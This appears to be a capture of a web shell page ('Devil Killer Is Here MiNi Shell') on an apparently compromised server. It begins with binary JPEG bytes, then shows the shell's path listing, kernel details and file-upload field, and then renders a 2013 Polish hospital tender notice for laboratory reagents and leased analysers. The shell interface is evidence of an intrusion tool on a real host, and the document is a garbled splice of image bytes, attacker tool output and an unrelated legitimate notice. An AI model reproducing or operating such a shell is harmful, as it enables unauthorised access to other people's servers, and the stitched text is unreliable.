JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131213/518454-N-2013.html

<p class="kh_header"><b>Nowa Dęba: DOSTAWA ODCZYNNIKÓW LABORATORYJNYCH ORAZ DZIERŻAWA APARATÓW dla Szpitala Powiatowego</b><br>
<b>Numer ogłoszenia: 518454 - 2013; data zamieszczenia: 13.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Nowej Dębie , ul. M. C. Skłodowskiej 1a, 39-460 Nowa Dęba, woj. podkarpackie, tel. 15 8462651 w. 120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoznowadeba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ODCZYNNIKÓW LABORATORYJNYCH ORAZ DZIERŻAWA APARATÓW dla Szpitala Powiatowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest DOSTAWA ODCZYNNIKÓW LABORATORYJNYCH ORAZ DZIERŻAWA PARATÓW dla Szpitala Powiatowego  w Nowej  Dębie z podziałem na części.
Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1do SIWZ - Formularz Asortymentowo-Cenowy oraz Załącznik nr 2 do SIWZ - Parametry techniczno-użytkowe aparatu do SIWZ.
Dostawę przedmiotu zamówienia do siedziby Zamawiającego zapewnia Wykonawca, ponosząc koszty i ryzyko transportu. 
Wykonawca może składać ofertę na całość lub wybrane przez siebie poszczególne części (PAKIETY) .
Wykonawca którego oferta zostanie wybrana jako najkorzystniejsza będzie zobowiązany do dostarczenia aparatu w ramach dzierżawy ponosząc koszty i ryzyko transportu, montaż oraz uruchomienie wraz ze szkoleniem personelu w terminie 5 dni od podpisania umowy.
Wykonawca zobowiązany jest do przekazania Zamawiającemu szczegółowych instrukcji obsługi w języku polskim oraz konserwacji dla każdego dostarczonego aparatu.
Natomiast asortyment, ilość i terminy dostaw odczynników będą określane na piśmie przesłane faxem lub e-mailem na numer / adres  Wykonawcy na max 10 dni wcześniej przed terminem dostawy.
Podane ilości odczynników laboratoryjnych są orientacyjne i w trakcie realizacji umowy mogą ulec zmianie. 
Zamawiający zastrzega sobie prawo niewykorzystywania całego asortymentu oraz niewykorzystania całej kwoty umownej.
Przedmiot dostawy zamieszczony w ofercie powinien posiadać:
1.Karty charakterystyki substancji niebezpiecznych występujących w oferowanych odczynnikach (karty charakterystyki należy dostarczyć przy pierwszej dostawie).
2.Termin przydatności minimum - 6 miesięcy od dnia dostawy;
W razie reklamacji ilościowych bądź jakościowych Wykonawca będzie je uwzględniał na swój koszt w ciągu 7 dni licząc od daty zgłoszenia reklamacji.
Wykonawca będzie przyjmował reklamacje jakościowe bez względu na termin zakupu, jednak nie później niż przed upływem terminu ważności.
Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, będzie zobowiązany do udzielenia gwarancji na  dostarczony w ramach dzierżawy aparat  przez okres obowiązywania umowy i będzie ponosić wszelkie koszty związane z naprawami gwarancyjnymi.
Zaoferowane przez Wykonawców w niniejszym postępowaniu wyroby, muszą spełniać wymagania określone ustawą z dnia 20 maja 2010r. o wyrobach medycznych ( Dz.U. z 2010r. Nr 107, poz.679 )  tj. certyfikat CE lub deklarację zgodności (jeśli prawo nakłada obowiązek posiadania takich dokumentów).
Po zakończeniu okresu obowiązywania umowy wydzierżawiony aparat zostanie zwrócony Wykonawcy.
Zamawiający  dopuszcza składanie ofert częściowych.
PAKIET Nr 1- Dostawa odczynników wraz z dzierżawą aparatu do badania krwi metodą immunochemiczną;
PAKIET Nr 2-Dostawa odczynników wraz z dzierżawą aparatu do wykonywania badań równowagi kwasowo-zasadowej;
PAKIET Nr 3 -Dostawa odczynników wraz z dzierżawą sprzętu do ich inkubacji i programem do oceny;
PAKIET Nr 4 -Dostawa odczynników wraz z dzierżawą aparatu do badań hematologicznych ;
PAKIET Nr 5 - Odczynniki do serologii grup krwi                      
PAKIET Nr 6 - Odczynniki do serologii grup krwi                      
PAKIET Nr 7 - Odczynnik do badania do badania w kierunku kiły
PAKIET Nr 8 - Odczynniki do serologii grup krwi                       
PAKIET Nr 9 - Odczynniki do koagulologii na aparat KSELMED 3002 OPTIC - ozn. Wykonywane met.mikro w dubletach  
PAKIET Nr 10 - Odczynniki do analityki ogólnej                        
PAKIET Nr 11 - Odczynniki  do analizatora hematologicznego SWELAB AC 900 i odczynnik  do rozmazów krwi 
PAKIET Nr 12 - Odczynniki gotowe- Chemia kliniczna- aparat STAT-FAX 1904 PAKIET Nr 13 - Testy latexsowe, kasetkowe i paskowe do met.jakościowych i półilościowych 
PAKIET Nr 14 -Odczynniki i podłoża                                     
PAKIET Nr 15 -Testy do wykrywania mikroorganizmów           
PAKIET Nr 16 -  Krążki diagnostyczne.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.61.00-6, 33.69.62.00-8, 38.43.40.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.Ze względu na charakter przedmiotu zamówienia Zamawiający nie żąda od Wykonawców dodatkowych dokumentów, w celu wykazania, iż spełniają w/w warunek. Ocena spełnienia powyższego warunku, odbędzie się na podstawie oświadczenia, przedstawionego przez Wykonawcę wraz z ofertą - w/g wzoru stanowiącego Załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw w okresie  ostatnich trzech lat  przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy 
- w tym okresie, wraz z podaniem ich wartości , przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dokumentów, czy zostały wykonane lub są wykonywane należycie; 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże że, zrealizował min 2 zamówienia na dostawę o charakterze co do przedmiotu jak i wartości zamówienia w zależności od wybranego pakietu.
Wykonawca zobowiązany jest do załączenia do oferty  dokumentów potwierdzających należyte wykonanie zamówienia (referencje).  
Dokument ten będzie potwierdzeniem, że Wykonawca posiada doświadczenie w zakresie realizacji dostaw  będących przedmiotem zamówienia.
W przypadku podmiotów składających ofertę wspólną Zamawiający uzna, że Wykonawcy spełniają w/w warunek, jeżeli wykażą, że wykonali łącznie wymaganą liczbę dostaw w danym pakiecie .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.Ze względu na charakter przedmiotu zamówienia Zamawiający nie żąda od Wykonawców dodatkowych dokumentów, w celu wykazania, iż spełniają w/w warunek. Ocena spełnienia powyższego warunku, odbędzie się na podstawie oświadczenia, przedstawionego przez Wykonawcę wraz z ofertą - w/g wzoru stanowiącego Załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.Ze względu na charakter przedmiotu zamówienia Zamawiający nie żąda od Wykonawców dodatkowych dokumentów, w celu wykazania, iż spełniają w/w warunek. Ocena spełnienia powyższego warunku, odbędzie się na podstawie oświadczenia, przedstawionego przez Wykonawcę wraz z ofertą - w/g wzoru stanowiącego Załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłacona polisa, a przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia,
i  zobowiązuje się do utrzymania tego  ubezpieczenia przez  okres trwania umowy aktualna na dzień składania ofert, wraz z dowodem - potwierdzeniem wpłaty przy sumie gwarancyjnej  nie mniejszej niż 20 000,00 zł .
Dokumenty te będą potwierdzeniem sytuacji ekonomicznej  i finansowej Wykonawcy, zapewniającej realizację dostaw zgodnych z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)Oświadczenie Wykonawcy, że oferowane wyroby posiadają odpowiednie dokumenty ( Certyfikaty CE i deklaracje zgodności wyrobu medycznego przyporządkowane do poszczególnych wyrobów) i są  one aktualne dla  
przedmiotowego postępowania, oraz mogą być stosowane w służbie  zdrowia zgodnie z ustawą z dnia 20 maja 2010r. dla wyrobów kwalifikowanych jako   wyroby  medyczne ( jeśli prawo nakłada obowiązek posiadania takich dokumentów) 
Zamawiający zastrzega sobie prawo żądania okazania przez Wykonawcę dokumentów dopuszczających zaoferowany asortyment do obrotu i stosowania.
b)Wykonawca jest zobowiązany do załączenia materiałów potwierdzających zgodność zaoferowanych parametrów i konfiguracji przedmiotu zamówienia ( prospekty lub broszury lub wyciągi z instrukcji lub foldery lub zdjęcia);</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)Postanowienia dotyczące wnoszenia  oferty wspólnej przez dwa lub więcej podmioty gospodarcze ( konsorcja / spółki cywilne) :
1.Wykonawcy mogą  wspólnie ubiegać się o udzielenie zamówienia.
2.Jeżeli oferta wspólna złożona przez dwóch lub więcej wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza przed podpisaniem umowy w sprawie zamówienia publicznego, Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych wykonawców, podpisanej przez wszystkich partnerów , przy czym  termin, na jaki została zawarta, nie może być  krótszy niż termin realizacji zamówienia.
3.Wykonawcy ustanawiają  pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy, a pełnomocnictwo / upoważnienie do pełnienia takiej funkcji 
wystawione zgodnie z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli  każdego z wykonawców winno być dołączone do oferty.
4.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia  ponoszą solidarną odpowiedzialność za wykonanie umowy. 
Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego  oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w 
wyznaczonym terminie, chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania; 
Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków SIWZ -  udziału w postępowaniu oraz spełnianie przez oferowane dostawy, wymagań określonych przez Zamawiającego, nie później niż w dniu w którym upłynął termin składania ofert.
Zamawiający może wezwać do złożenia wyjaśnień w wyznaczonym przez siebie terminie, dotyczących oświadczeń lub dokumentów, o których mowa w art. 25 ust.1.
Dokumenty są  składane w  oryginale lub kopii  poświadczonej za zgodność  z  oryginałem  przez  Wykonawcę. 
Wykonawca udostępni Zamawiającemu w/w dokumenty na każde żądanie Zamawiającego.
b) Wypełniony i podpisany Załącznik nr 1 do SIWZ -Formularz Asortymentowo-Cenowy ( w zależności od wybranego pakietu ).
Zamawiający dopuszcza zmianę formy załącznika nr 1 przez Wykonawcę lecz zastrzega,  że  musi  zawierać co do treści wszystkie  dane podane we wzorze do SIWZ.
c) Wypełniony i podpisany Załącznik nr 2 do SIWZ - Parametry Techniczno-Użytkowe Aparatu ( w zależności od wybranego pakietu)
d)Wypełniony i podpisany formularz Załącznik nr 3 do SIWZ - Oferta  Wykonawcy (w zależności od wybranego pakietu)
e)Wypełniony i podpisany Załącznik nr 4 do SIWZ - Oświadczenie o spełnieniu warunków udziału w postępowaniu
f)Wypełniony i podpisany Załącznik nr 5 do SIWZ - Oświadczenie Wykonawcy o braku podstaw do  wykluczenia     
g)Parafowany na każdej stronie Załącznik nr 6 do SIWZ -Wzór umowy ( w zależności od wybranego pakietu)
h)Pełnomocnictwo  osoby / osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie wynikają  z przepisów prawa lub innych dokumentów;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoznowadeba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej 39-460 Nowa Dęba, ul.M.C.Skłodowskiej 1A:osobiście pokój Nr 111;za zalicz. pocztowym przesyłając wniosek i nr NIP.Cena SIWZ 20,00 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2013 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej 39-460 Nowa Dęba, ul.M.C.Skłodowskiej 1A - Sekretariat pokój Nr 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET  Nr 1   - Dostawa odczynników wraz z dzierżawą aparatu do badania krwi metodą immunochemiczną;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa odczynników wraz z dzierżawą aparatu do badania krwi metodą immunochemiczną dla potrzeb Laboratorium Analitycznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET  Nr 2- Dostawa odczynników wraz z dzierżawą aparatu do wykonywania badań równowagi kwasowo-zasadowej;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa odczynników wraz z dzierżawą aparatu do wykonywania badań równowagi kwasowo-zasadowej dla potrzeb Laboratorium Analitycznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET Nr 3-Dostawa odczynników wraz z dzierżawą sprzętu do ich inkubacji i programem do oceny;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa odczynników wraz z dzierżawą sprzętu do ich inkubacji i programem do oceny dla potrzeb Laboratorium Analitycznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET Nr 4 - Dostawa odczynników wraz z dzierżawą aparatu do badań hematologicznych ;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa odczynników wraz z dzierżawą aparatu do badań hematologicznych dla potrzeb Laboratorium Analitycznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET Nr 5  - Odczynniki do serologii grup krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki do serologii grup krwi dla potrzeb Pracowni Serologicznej - Banku Krwi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.61.00-6, 33.69.62.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET  Nr 6  - Odczynniki do serologii grup krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki do serologii grup krwi dla potrzeb Pracowni Serologicznej - Banku Krwi.</p></li>
